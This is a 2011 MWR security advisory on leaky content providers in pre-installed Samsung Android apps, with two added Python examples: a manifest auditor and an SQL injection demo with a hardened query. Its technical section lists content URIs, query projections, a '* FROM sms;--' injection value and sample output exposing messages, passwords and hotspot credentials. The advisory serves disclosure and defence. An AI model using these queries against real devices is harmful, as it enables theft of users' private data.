Multiple Samsung (Android) Application Vulnerabilities
MWR InfoSecurity Advisory
13/12/2011

Name: Multiple pre-installed Samsung applications
Date: 13th December 2011
Affected Versions: Samsung Galaxy S2 (I9100XWKI4) Android. Other models running these applications may be affected.
CVE Reference: None
Authors: Tyrone Erasmus, Mike Auty (Channels SQLi)
Severity: High Risk
Local/Remote: Local
Vulnerability Class: Android Content Providers
Vendor: Samsung
Vendor Response: Vendor updated all vulnerable software, and firmware releases after 13th March 2012 contain the fixes.

Description

Many Samsung applications are pre-installed by default on Samsung Android devices and these applications cannot be removed by the user. Some of these applications make use of content providers which are implicitly exported by default. This results in these content providers allowing other applications on the device to request sensitive information and successfully obtain it. This is cause for concern as any 3rd party application containing malicious code does not require any granted permissions in order to obtain sensitive information from these applications. It should be noted that only applications disclosing potentially sensitive information are being reported on in this document.

The following applications allow the retrieval of sensitive information from their content providers without any granted permissions:

Application | Obtainable information | Version
com.sec.android.socialhub | address password contents Instant messages Social networking messages |
com.sec.android.im (IM) | Instant messages IM contacts |
com.android.providers.telephony (Dialer Storage) | SMS |
com.sec.android.provider.logsprovider (LogsProvider) | SMS contents Instant messages Social networking messages Call logs | 1.0
com.sec.android.widgetapp.weatherclock (AccuWeather.com) | Location |
com.sec.android.app.minidiary (MiniDiary) | Notes Photo GPS coordinates | 1.0
com.sec.android.app.memo (Memo) | Notes | 1.0
com.sec.android.widgetapp.postit (Minipaper) | Notes | 1.0
com.osp.app.signin (Samsung account) | Encrypted account information | 1.0
com.android.providers.settings (Settings Storage) | Portable Wi-Fi hotspot credentials |

Impact

Malicious applications installed on the same device as the vulnerable applications could steal sensitive information from the user and transmit it back to the attacker.

Cause

These vulnerabilities are present because insufficient security permissions are set on the content provider section in each of the vulnerable application's AndroidManifest.xml file.
Interim Workaround

Avoid using the vulnerable applications if you do not have access to the firmware update. To clear information stored in these applications, go to Settings->Applications->Manage Applications and press Clear data.

Solution

In the AndroidManifest.xml file of each application that contains a content provider, it was recommended that read and write permissions are set. An example is shown below:

    <provider android:name=".db.provider"
              android:authorities="com.example.app"
              android:readPermission="com.example.app.provider.permission.read"
              android:writePermission="com.example.app.provider.permission.write" />

This means that an application wanting to read or write to this content provider needs to have the stated permissions in order to do so.
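One way to check a decoded AndroidManifest.xml for the condition described under Cause and Solution, as an added example that is not part of the MWR advisory. The sample manifest, the `audit_providers` function and every name other than com.example.app and its two permissions are constructed for illustration; the check assumes a provider with no android:exported attribute is exported when the target SDK is below 17, and it also flags a permission declared with protectionLevel "normal", since that level is granted to any application that requests it.

```python
import xml.etree.ElementTree as ET

ANDROID = "{http://schemas.android.com/apk/res/android}"

# Constructed sample: only the first provider mirrors the advisory's example.
SAMPLE_MANIFEST = """
<manifest xmlns:android="http://schemas.android.com/apk/res/android"
          package="com.example.app">
  <uses-sdk android:minSdkVersion="8" android:targetSdkVersion="10"/>
  <permission android:name="com.example.app.provider.permission.read"
              android:protectionLevel="signature"/>
  <permission android:name="com.example.app.provider.permission.write"
              android:protectionLevel="signature"/>
  <permission android:name="com.example.app.permission.NOTES"
              android:protectionLevel="normal"/>
  <application>
    <provider android:name=".db.provider"
              android:authorities="com.example.app"
              android:readPermission="com.example.app.provider.permission.read"
              android:writePermission="com.example.app.provider.permission.write"/>
    <provider android:name=".NotesProvider"
              android:authorities="com.example.app.notes"/>
    <provider android:name=".LogProvider"
              android:authorities="com.example.app.logs"
              android:readPermission="com.example.app.permission.NOTES"/>
    <provider android:name=".CacheProvider"
              android:authorities="com.example.app.cache"
              android:exported="false"/>
  </application>
</manifest>
"""


def audit_providers(manifest_xml):
    """Return [(authorities, [issues])] for exported providers that are
    readable or writable without a meaningful permission."""
    root = ET.fromstring(manifest_xml.strip())

    # targetSdkVersion falls back to minSdkVersion, which falls back to 1.
    sdk = root.find("uses-sdk")
    target = None
    if sdk is not None:
        target = (sdk.get(ANDROID + "targetSdkVersion")
                  or sdk.get(ANDROID + "minSdkVersion"))
    target_sdk = int(target) if target and target.isdigit() else 1

    # Permissions this app declares, with their protection level
    # (an omitted protectionLevel means "normal").
    levels = {p.get(ANDROID + "name"): p.get(ANDROID + "protectionLevel", "normal")
              for p in root.iter("permission")}

    findings = []
    for prov in root.iter("provider"):
        exported = prov.get(ANDROID + "exported")
        if exported is None:
            is_exported = target_sdk < 17      # implicit export on old targets
        else:
            is_exported = exported.strip().lower() == "true"
        if not is_exported:
            continue

        # android:permission covers both directions unless overridden.
        fallback = prov.get(ANDROID + "permission")
        issues = []
        for access, attr in (("read", "readPermission"),
                             ("write", "writePermission")):
            perm = prov.get(ANDROID + attr) or fallback
            if perm is None:
                issues.append(f"{access}: no permission required")
            elif levels.get(perm) == "normal":
                issues.append(f"{access}: {perm} is protectionLevel normal")
        if issues:
            findings.append((prov.get(ANDROID + "authorities"), issues))
    return findings


if __name__ == "__main__":
    for authority, issues in audit_providers(SAMPLE_MANIFEST):
        print(authority)
        for issue in issues:
            print("   ", issue)
```
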
Technical Description

The following section will be organised by the information that is obtainable by an unprivileged application. The premise of this section is that an application with no granted permissions can perform a query on the specified content providers in order to obtain the targeted information.

When querying a content provider, methods are provided that allow the developer to construct SQL statements. The following is what the query method in Android looks like to a developer:

    query(uri, projection, selection, selectionArgs, sortOrder)

These parameters get used at various points in a SQL statement to construct the query. This also means that there are often SQL injection vulnerabilities present in these fields on content providers.

Registered user accounts within Social Hub and their associated service.

Uri: content://com.seven.provider. /accounts
Projection: user_name, provision_name

user_name | provision_name
testaccount@yahoo.com | Yahoo! Messenger
testaccount@yahoo.com | Yahoo! Mail

The password for instant messaging accounts within Social Hub. This password is often the same for the account and IM account on services like Yahoo and Google.

Uri: content://com.seven.provider. /dbprefs

_id | category | type | key | value | flags
242 | Account-6 | 5 | Z7_IM_CLIENT_SETTING_PASSWORD_STRING | Password123 | 0
messages.

Uri: content://com.seven.provider. / s
Projection: _id, _from, subject, body

_id _from subject body
30 Test subject contents

com.sec.android.provider.logsprovider (LogsProvider)

messages.

Uri: content://logs/ _seven
Projection: messageid, address, m_subject, m_content

messageid address m_subject m_content
30 Test subject contents

All accounts registered in Social Hub have their contents logged. This query to the logs content provider shows the same data as com.seven.provider. provider except that even if the account gets deregistered or removed from Social Hub, the logs still persist.

Instant Messages

Get all contacts.

Uri: content://com.seven.provider.im/contacts
Projection: contact

contact
John
Paul
Susan
Get instant messages from Social Hub.

Uri: content://com.seven.provider.im/messages
Projection: _id, contact, account, body

_id | contact | account | body
14 | John | 6 | Hi, how are you?

com.sec.android.provider.logsprovider (LogsProvider)

Get the same instant message as above, except from the logs.

Uri: content://logs/im
Projection: account_id, name, m_content

account_id | buddy_name | message
6 | John | Hi, how are you?

The logs persist even after an IM account has been deregistered.

com.sec.android.im (IM)

Get the same instant message as above, except from the IM application itself.

Uri: content://com.tecace.app.convprovider
Projection: _id, accountid, buddy_name, message

_id accountid buddy_name message
3-1 null Hi, how are you?
SMS

com.android.providers.telephony (Dialer Storage)

All SMS messages.

Uri: content://channels
Projection: * FROM sms;--

_id thread_id address person date protocol read status type reply_path_present subject body service_center locked error_code seen deletable hidden group_id group_type delivery_date
null null null null This is a message from me to you null null null

SQL injection exists within the projection and selection parameters for the channels content provider.

com.sec.android.provider.logsprovider (LogsProvider)

First 50 characters of SMS messages.

Uri: content://logs/historys
Projection: number, m_content
Selection: number like '+%'

number m_content
This is a message from me to you
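The projection and selection injection reported above for content://channels, modelled with Python's sqlite3 module next to a hardened form of the same query; this is an added example, not code from the advisory or from the affected application. The table schemas, sample rows, function names and column allowlist are constructed, and the allowlist plays the role that SQLiteQueryBuilder.setProjectionMap plays on Android.

```python
import re
import sqlite3


def make_db():
    """Constructed stand-in for a provider database holding two tables."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE channels (_id INTEGER PRIMARY KEY, name TEXT);
        CREATE TABLE sms (_id INTEGER PRIMARY KEY, address TEXT, body TEXT);
        INSERT INTO channels (name) VALUES ('news');
        INSERT INTO sms (address, body)
            VALUES ('+10000000000', 'This is a message from me to you');
    """)
    return db


def build_sql(table, projection, selection=None):
    """Naive statement assembly: caller-supplied parts are concatenated."""
    sql = "SELECT " + ", ".join(projection) + " FROM " + table
    if selection:
        sql += " WHERE " + selection
    return sql


def query_vulnerable(db, projection, selection=None, selection_args=()):
    # The projection is trusted as a list of column names, so a value such
    # as "* FROM sms;--" rewrites which table the statement reads.
    sql = build_sql("channels", projection, selection)
    return db.execute(sql, selection_args).fetchall()


# Hardened form: only these columns may be named by the caller.
ALLOWED_COLUMNS = ("_id", "name")
# A selection term must be "<allowed column> <operator> ?" so that every
# value arrives as a bound argument; terms may be joined with AND.
_TERM = re.compile(r"^\s*(\w+)\s*(<=|>=|=|<|>|LIKE)\s*\?\s*$", re.IGNORECASE)


def check_projection(projection):
    for col in projection:
        if col not in ALLOWED_COLUMNS:
            raise ValueError(f"projection column not allowed: {col!r}")
    return list(projection)


def check_selection(selection):
    if selection is None:
        return None
    for term in re.split(r"\s+AND\s+", selection, flags=re.IGNORECASE):
        match = _TERM.match(term)
        if match is None or match.group(1) not in ALLOWED_COLUMNS:
            raise ValueError(f"selection term not allowed: {term!r}")
    return selection


def query_hardened(db, projection, selection=None, selection_args=()):
    sql = build_sql("channels",
                    check_projection(projection or ALLOWED_COLUMNS),
                    check_selection(selection))
    return db.execute(sql, selection_args).fetchall()


if __name__ == "__main__":
    db = make_db()
    injected = ["* FROM sms;--"]          # projection value shown above
    print(build_sql("channels", injected))
    print(query_vulnerable(db, injected))
    print(query_hardened(db, ["_id", "name"], "name = ?", ("news",)))
    try:
        query_hardened(db, injected)
    except ValueError as exc:
        print("rejected:", exc)
```
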
Social Networking Messages

com.sec.android.socialhub

Messages from Social Networks.

Uri: content://com.sec.android.socialhub.unifiedinbox/messages
Projection: name,m_subject,m_content

name | m_subject | m_content
John Smith | Birthday | Are you coming to my party?

Notes

com.sec.android.app.minidiary (MiniDiary)

All notes entries, photos and photo locations.

Uri: content://com.sec.android.providers.minidiary.minidiarydata/diary
Projection: _id, location, date, longitude, latitude, picture_file, note

_id location date longitude latitude picture_file note
1 Germany, Hesse /data/data/com.sec.android.app.minidiary/files/picture/ jpg Beautiful!

It should also be noted that on Android the contents of the SD card are accessible from any application, allowing applications to retrieve them and upload them to an attacker.

com.sec.android.app.memo (Memo)

User notes stored in this application.

Uri: content://com.samsung.sec.android/memo/all
Projection: _id, title, content

_id title content
Note contents
com.sec.android.widgetapp.postit (Minipaper)

User notes stored in this application.

Uri: content://com.sec.android.widgetapp.postit/postit
Projection: _id, body

_id | body
1 | My first postit!

Miscellaneous

com.sec.android.socialhub

Name of the owner of the device.

Uri: content://com.sec.android.socialhub.unifiedinbox/sns_msg_receiver_map
Projection: receiver_name

receiver_name
Tyrone Erasmus

com.sec.android.widgetapp.weatherclock (AccuWeather.com)

General location of the owner of the device.

Uri: content://com.sec.android.widgetapp.weatherclock

NAME STATE LOCATION MAIN_DISPLAY SUMMER_TIME LATITUDE LONGITUDE PROVIDER
Pretoria Gauteng, South Africa cityid:
com.osp.app.signin (Samsung account)

Obtain encrypted Samsung account settings.

Uri: content://com.osp.contentprovider.ospcontentprovider/identity

Value | Key
<base64_value> | UserID
<base64_value> | ID
<base64_value> | Password
<base64_value> | MobileCountryCode
<base64_value> | AuthToken
<base64_value> | AuthTokenSecret
<base64_value> | BirthDate
<base64_value> | UserDeviceID

It should be noted that the <base64_value> given above is an encrypted string that has been base64 encoded. If the mechanism that encrypts and decrypts this data is found to be weak, the user's Samsung account would be compromised.

com.android.providers.settings (Settings Storage)

Portable Wi-Fi hotspot credentials.

Uri: content://settings/secure

_id | name | value
2736 | wifi_ap_passwd | h0tsp0tp@ssw0rd
2859 | wifi_ap_ssid | Hotspot1234
More informationSecurity in Bomgar Remote Support
Security in Bomgar Remote Support 2018 Bomgar Corporation. All rights reserved worldwide. BOMGAR and the BOMGAR logo are trademarks of Bomgar Corporation; other trademarks shown are the property of their
More informationSecurity of End User based Cloud Services Sang Young
Security of End User based Cloud Services Sang Young Chairman, Mobile SIG Professional Information Security Association sang.young@pisa.org.hk Cloud Services you can choose Social Media Business Applications
More informationOPEN WEB APPLICATION SECURITY PROJECT OWASP TOP 10 VULNERABILITIES
OPEN WEB APPLICATION SECURITY PROJECT OWASP TOP 10 VULNERABILITIES What is the OWASP Top 10? A list of the top ten web application vulnerabilities Determined by OWASP and the security community at large
More informationBasware - Verian Mobile App Guide Basware P2P 18.2
Basware - Verian Mobile App Guide Basware P2P 18.2 Copyright 1999-2018 Basware Corporation. All rights reserved.. 1 Introduction The mobile app is a streamlined tool that allows you to take pictures of
More informationAEM Mobile: Setting up Google as an Identity Provider
AEM Mobile: Setting up Google as an Identity Provider Requirement: Prerequisite knowledge Understanding of AEM Mobile Required Products AEM Mobile Google Account Generating the client ID and secret To
More informationTHE NEW LANDSCAPE OF AIRBORNE CYBERATTACKS
SESSION ID: MBS-W04 THE NEW LANDSCAPE OF AIRBORNE CYBERATTACKS Nadir Izrael CTO & Co-Founder Armis, Inc. Ben Seri Head of Research Armis, Inc. Placeholder Slide: Image of spread of infection Placeholder
More informationLayer Seven Security ADVISORY
Layer Seven Security ADVISORY SAP Security Notes June 2014 SAP released an important notification in June to highlight a critical vulnerability in SAP Afaria, the Sybase platform that enables centralized
More informationSAMSUNG GALAXY TAB TUTORIAL CONTENT
1 SAMSUNG GALAXY TAB TUTORIAL CONTENT SYNCHRONISATION WITH KIES...2 FIRST USE SETUP...3 ICONS AND NAVIGATION...4 ACCESS THE WIRELESS NETWORK...5 E-MAIL AND CALENDAR SETUP...7 E-MAIL FUNCTIONALITY...9 CALENDAR
More informationComodo Mobile Security for Android Software Version 2.5
Comodo Mobile Security for Android Software Version 2.5 User Guide Guide Version 2.5.010215 Comodo Security Solutions 1255 Broad Street Clifton, NJ 07013 Table of Contents 1.Introduction to Comodo Mobile
More informationSecurity Enhancements in Informatica 9.6.x
Security Enhancements in Informatica 9.6.x 1993-2016 Informatica Corporation. No part of this document may be reproduced or transmitted in any form, by any means (electronic, photocopying, recording or
More informationTelenor MDM. Quick Start Guide
Telenor MDM Quick Start Guide February 2016 Table of content 1 Usage information... 9 1.1 About... 9 1.2 Home hyperlink... 9 1.3 Description of the warning flags... 9 1.4 Greyed (read-only) items... 10
More informationAT&T Unified Communications Services. Installing Cisco Jabber for AT&T UC Voice on an Android Smartphone
AT&T Unified Communications Services Installing Cisco Jabber for AT&T UC Voice on an Android Smartphone For End Users V1.1 Septemberly, 2015 Disclaimer The contents of the document may be revised by AT&T
More informationVIEVU Solution App User Guide
VIEVU Solution App User Guide Contact Us If you need assistance or have any questions, please visit www.vievu.com/vievu-solutionsupport, contact us by phone at 888-285-4548, or email support@vievu.com.
More informationAxon Capture for Android Devices User Manual
Axon Capture for Android Devices User Manual Document Revision: E Product functions and specifications may change without notice and the actual product may vary from the illustrations in this manual. Google,
More information